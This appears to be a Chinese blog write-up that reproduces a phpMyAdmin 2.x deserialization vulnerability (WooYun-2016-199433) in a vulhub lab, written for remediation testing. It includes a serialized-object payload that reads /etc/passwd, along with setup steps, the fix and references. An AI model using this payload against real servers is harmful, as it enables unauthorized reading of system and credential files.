zoukankan      html  css  js  c++  java
  • phpMyAdmin 2.x版本反序列化漏洞复现(WooYun-2016-199433)

    简介

    这几天发现内网环境出现几起WooYun-2016-199433漏洞,需要复测协助解决漏洞;

    phpmyadmin是一套开源的、基于Web的Mysql数据库管理工具;

    phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

    漏洞环境

    https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

    这里使用vulhub一键搭建漏洞环境

    漏洞复现

    启动漏洞环境:docker-compose up -d

     访问漏洞地址:

    写入执行POC读取passwd文件:action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

    漏洞分析

    https://docs.ioin.in/writeup/www.mottoin.com/4cb63e7c-9151-42da-a5bd-e6e29e7ff2f8/index.html

    影响版本

    phpmyadmin 2.x版本

    漏洞修复

    升级版本

    参考

    https://www.cnblogs.com/xhds/p/12579425.html

    https://www.cnblogs.com/null1433/p/12809368.html

    https://www.pianshen.com/article/3531179499/

    https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/

    https://docs.ioin.in/writeup/www.mottoin.com/4cb63e7c-9151-42da-a5bd-e6e29e7ff2f8/index.html

  • 相关阅读:
    一些tcp通讯代码
    使用资源监控工具 glances
    命令行方式运行yii2程序
    php获取apk信息
    Yii2简单纪要
    LuCI探究(转)
    proguard混淆jar文件
    hibernate-search-5.1.1简易使用
    数据库应用-java+sqlserver(六)MyFrame
    数据库应用-java+sqlserver(五)ModifyPassword
  • 原文地址:https://www.cnblogs.com/lijingrong/p/14215244.html
Copyright © 2011-2022 走看看